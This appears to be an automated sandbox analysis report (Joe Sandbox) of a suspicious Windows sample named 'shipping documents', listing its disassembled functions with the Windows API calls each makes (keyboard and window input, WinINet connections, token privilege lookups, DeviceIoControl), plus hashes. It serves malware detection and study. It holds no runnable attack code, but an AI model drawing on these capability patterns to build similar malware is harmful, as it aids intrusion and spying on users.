Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
Instruction ID: d5414a2b096f9e0c32155c298dc4a718b5a585ebae69b11babd531c5c06a8e38
Opcode Fuzzy Hash: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
Instruction Fuzzy Hash: C0314BB0D402187AFF208B698C257FA7BABAB46310F84431FE6919A6D1C3354AD58751

Function 00686415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068644B
__isleadbyte_l.LIBCMT ref: 00686479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006864A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006864DD

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d2238880bf422297911690249cc108e04c1db1a8e15e833fbf54b5657e493d27
Instruction ID: dac6b534151aeb0488c1330d3c7c7a608671ca40119f33c9c47418d6c6033598
Opcode Fuzzy Hash: d2238880bf422297911690249cc108e04c1db1a8e15e833fbf54b5657e493d27
Instruction Fuzzy Hash: 1331CF31600256EFDB21AF65CC45BAE7BE7FF40320F158229F855872A1EB31D851DB90

Function 006D5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006D5189

Part of subcall function 006B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006B3897
Part of subcall function 006B387D: GetCurrentThreadId.KERNEL32 ref: 006B389E
Part of subcall function 006B387D: AttachThreadInput.USER32(00000000,?,006B52A7), ref: 006B38A5

GetCaretPos.USER32(?), ref: 006D519A
ClientToScreen.USER32(00000000,?), ref: 006D51D5
GetForegroundWindow.USER32 ref: 006D51DB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 96f16ee0ffec38ec37aa74049522f245340b70c55410de9c2bece3e6a1ebacbf
Instruction ID: e746339cf9a59603aa8a3e8316a8b9e2b57565ac341cdf26e0ae402db71efe59
Opcode Fuzzy Hash: 96f16ee0ffec38ec37aa74049522f245340b70c55410de9c2bece3e6a1ebacbf
Instruction Fuzzy Hash: 4C312F71E00118AFDB40EFA5CC459EFB7FAEF98300F10406AE816E7241DA759E45CBA4

Function 006DC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

GetCursorPos.USER32(?), ref: 006DC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0068BBFB,?,?,?,?,?), ref: 006DC7D7
GetCursorPos.USER32(?), ref: 006DC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0068BBFB,?,?,?), ref: 006DC85E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8e69aab2f2341044991c50bcddcae8983766d633b3f149f26b4ab18778991a91
Instruction ID: 00c05830e7b7d8383dd352f704df314c97e551aef05f5f01bd15637415bb86ce
Opcode Fuzzy Hash: 8e69aab2f2341044991c50bcddcae8983766d633b3f149f26b4ab18778991a91
Instruction Fuzzy Hash: 69318535A00019AFCB15CF98D898EEA7FBBEB49320F04406AF906873A1C7355D51EF64

Function 00670BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00670BF2

Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7B20,?,?,00000000), ref: 00655B8C
Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7B20,?,?,00000000,?,?), ref: 00655BB0

_fprintf.LIBCMT ref: 00670C29
OutputDebugStringW.KERNEL32(?), ref: 006A6331

Part of subcall function 00674CDA: _flsall.LIBCMT ref: 00674CF3

__setmode.LIBCMT ref: 00670C5E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 341ceb289e7ee92091e452b344dd08f28024689f6b845c288c8fe6d3e1f93f23
Instruction ID: dd68e7b27fb7438578866be1a8b6bd886131a883d8432f740c12fc951eaffa71
Opcode Fuzzy Hash: 341ceb289e7ee92091e452b344dd08f28024689f6b845c288c8fe6d3e1f93f23
Instruction Fuzzy Hash: 57112731904208BEDB45B3B89C4B9FE7B6F9F45320F18815EF20957192DF311D8687A9

Function 006A8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8669
Part of subcall function 006A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A8673
Part of subcall function 006A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8682
Part of subcall function 006A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8689
Part of subcall function 006A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006A8BEB
_memcmp.LIBCMT ref: 006A8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A8C44
HeapFree.KERNEL32(00000000), ref: 006A8C4B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 1947faf47c71ccbd6348512db6980ac7f2c33af67aa64a9f72b7ca0bcdb5db9c
Instruction ID: 3d07022bd3231f4bfc351bd2aa3219858acc45433e2e73ae31818d4068879956
Opcode Fuzzy Hash: 1947faf47c71ccbd6348512db6980ac7f2c33af67aa64a9f72b7ca0bcdb5db9c
Instruction Fuzzy Hash: 6C216871E02208AFDB00EFA4C944BEEB7BAEB41351F044099E456A7240DA30AE06CF60

Function 006C1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006C1A97

Part of subcall function 006C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C1B40
Part of subcall function 006C1B21: InternetCloseHandle.WININET(00000000), ref: 006C1BDD

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 925d60ef2ca3373e1b41aa593ab9a259d8a28e7a3891859569933bc75be233db
Instruction ID: c77cb4468a1f789369e496d6ee30d4320cee5d2a9468d61f8b50352dfb005408
Opcode Fuzzy Hash: 925d60ef2ca3373e1b41aa593ab9a259d8a28e7a3891859569933bc75be233db
Instruction Fuzzy Hash: 5C21A175201605BFDB129F609C01FBBB7AFFF46701F14001EFA169A652EB71E8119BA4

Function 006AE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006AE1C4,?,?,?,006AEFB7,00000000,000000EF,00000119,?,?), ref: 006AF5BC
Part of subcall function 006AF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 006AF5E2
Part of subcall function 006AF5AD: lstrcmpiW.KERNEL32(00000000,?,006AE1C4,?,?,?,006AEFB7,00000000,000000EF,00000119,?,?), ref: 006AF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,006AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006AE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 006AE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,006AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006AE237

Strings

cdecl, xrefs: 006AE22E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c5da7b1f3b071eb40ce69feeec0abb86fba561e1f892e9b4f8e8f4b0ced27cb9
Instruction ID: 0fc788031163ae65a78be7794aa991b52da7ef2b2a7ae86abea9027338572e5f
Opcode Fuzzy Hash: c5da7b1f3b071eb40ce69feeec0abb86fba561e1f892e9b4f8e8f4b0ced27cb9
Instruction Fuzzy Hash: 5B119336200345EFCB25BF64DC45E7A77AAFF46350B40802AF806CB264EB729D51DBA5

Function 00685332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00685351

Part of subcall function 0067594C: __FF_MSGBANNER.LIBCMT ref: 00675963
Part of subcall function 0067594C: __NMSG_WRITE.LIBCMT ref: 0067596A
Part of subcall function 0067594C: RtlAllocateHeap.NTDLL(01310000,00000000,00000001,00000000,?,?,?,00671013,?), ref: 0067598F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 484d1b2a21c2a7c16968dd350f1b4aaa69c187660c6e691bbe545427576f4a7e
Instruction ID: 636b0383632b261384597566884067bec7f84e48f12770384abffb813a2b69e6
Opcode Fuzzy Hash: 484d1b2a21c2a7c16968dd350f1b4aaa69c187660c6e691bbe545427576f4a7e
Instruction Fuzzy Hash: BF110432544A15AFCF313F70E80869937975F103E0B10862EF90A9B290EAB58D419394

Function 00654531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00654560

Part of subcall function 0065410D: _memset.LIBCMT ref: 0065418D
Part of subcall function 0065410D: _wcscpy.LIBCMT ref: 006541E1
Part of subcall function 0065410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006541F1

KillTimer.USER32(?,00000001,?,?), ref: 006545B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006545C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0068D6CE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e86efbe86fb271a034b6df4e64080372c1a1557b4f57851f3638ef1b17149dbc
Instruction ID: 0811fcb6cdfcb3f8cb2b19d9588740d1199650e948e95dfe20cf3e19d50af765
Opcode Fuzzy Hash: e86efbe86fb271a034b6df4e64080372c1a1557b4f57851f3638ef1b17149dbc
Instruction Fuzzy Hash: 3F212C709047889FEB329B24DC45BE7BBEEAF01309F00009EE69E562C1DB741AC9CB51

Function 006B40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006B40D1
_memset.LIBCMT ref: 006B40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006B4144
CloseHandle.KERNEL32(00000000), ref: 006B414D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: fdc45ed8a834c93c5f841ec94cce8a2815bb0daacdf26776c6c1b48ce264ffa7
Instruction ID: bcc3ec797a2fae5ccbddaee9421d8eb77fa40ba6672caea67c5df361a6908b89
Opcode Fuzzy Hash: fdc45ed8a834c93c5f841ec94cce8a2815bb0daacdf26776c6c1b48ce264ffa7
Instruction Fuzzy Hash: 25119875D412287AD7309BA59C4DFEBBB7DEB44760F10419AF908D7280D6744F808BA4

Function 006C667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7B20,?,?,00000000), ref: 00655B8C
Part of subcall function 00655B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7B20,?,?,00000000,?,?), ref: 00655BB0

gethostbyname.WSOCK32(?,?,?), ref: 006C66AC
WSAGetLastError.WSOCK32(00000000), ref: 006C66B7
_memmove.LIBCMT ref: 006C66E4
inet_ntoa.WSOCK32(?), ref: 006C66EF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 93f578d9858f5e85855db485c83ab46031b09fec6c7f8bd71a4f0656ffc0a61e
Instruction ID: 2419f52478a7fada19ee5fd88227842475be49192802f077e78fd0c4dc9941bc
Opcode Fuzzy Hash: 93f578d9858f5e85855db485c83ab46031b09fec6c7f8bd71a4f0656ffc0a61e
Instruction Fuzzy Hash: 81114F35900508AFCB40EBA4D99ADEE77BAEF14311B14406DF907A7161DF309F04DBA5

Function 006A9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 006A9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A9086

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 48725077ede48ddd8524ea1902ab79d0686450f7dc7be43bc0978a19a7615a12
Instruction ID: b1bd8e2b4d6d6fed3e9a800fc789c56ed8600325b1aeb44de51d1731eb83aae7
Opcode Fuzzy Hash: 48725077ede48ddd8524ea1902ab79d0686450f7dc7be43bc0978a19a7615a12
Instruction Fuzzy Hash: 8A115E79901218FFDB10DFA5CC84EDDBB75FB49350F204095E904B7290D6716E10DBA4

Function 00651290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

DefDlgProcW.USER32(?,00000020,?), ref: 006512D8
GetClientRect.USER32(?,?), ref: 0068B84B
GetCursorPos.USER32(?), ref: 0068B855
ScreenToClient.USER32(?,?), ref: 0068B860

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 25e87bffb83d2e057ac46aca461a5c157d63cd174ae394dd04b98d464862c9d3
Instruction ID: 5f43c04678c5353809181fde0f4c1a4f71e415123d18c3b2a17d7c01eabbe1b8
Opcode Fuzzy Hash: 25e87bffb83d2e057ac46aca461a5c157d63cd174ae394dd04b98d464862c9d3
Instruction Fuzzy Hash: 93110D35901019BFCB10DFA8D885AFE77BAEB06305F104556F911E7251C730BB95CBA9

Function 006B1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006B01FD,?,006B1250,?,00008000), ref: 006B166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,006B01FD,?,006B1250,?,00008000), ref: 006B1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006B01FD,?,006B1250,?,00008000), ref: 006B169E
Sleep.KERNEL32(?,?,?,?,?,?,?,006B01FD,?,006B1250,?,00008000), ref: 006B16D1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 6368033ec2d34332fb11618dfc4acebb0fd37cba6f82117a037c1086a5604cfe
Instruction ID: 003112455097cec4198e3751fc09fa621edc15886445f6e5a1c6a308da805b85
Opcode Fuzzy Hash: 6368033ec2d34332fb11618dfc4acebb0fd37cba6f82117a037c1086a5604cfe
Instruction Fuzzy Hash: 86118E71C0151CE7CF009FA5D858AEEBB79FF0A741F54405AE941BA240DB3055A0CB96

Function 00687207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0068722B

Part of subcall function 00687912: __fltout2.LIBCMT ref: 0068793B

__cftog_l.LIBCMT ref: 00687251
__cftoe_l.LIBCMT ref: 00687283

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: f8e381d61c0df0911694416f5b74bfd1fae0993a9c4bf7895775315fd98728a9
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 3F018C3204814ABBCF526E84DC518EE3F23BF29340B288615FA2858131D337CAB1AB81

Function 006DB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006DB59E
ScreenToClient.USER32(?,?), ref: 006DB5B6
ScreenToClient.USER32(?,?), ref: 006DB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006DB5F5

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
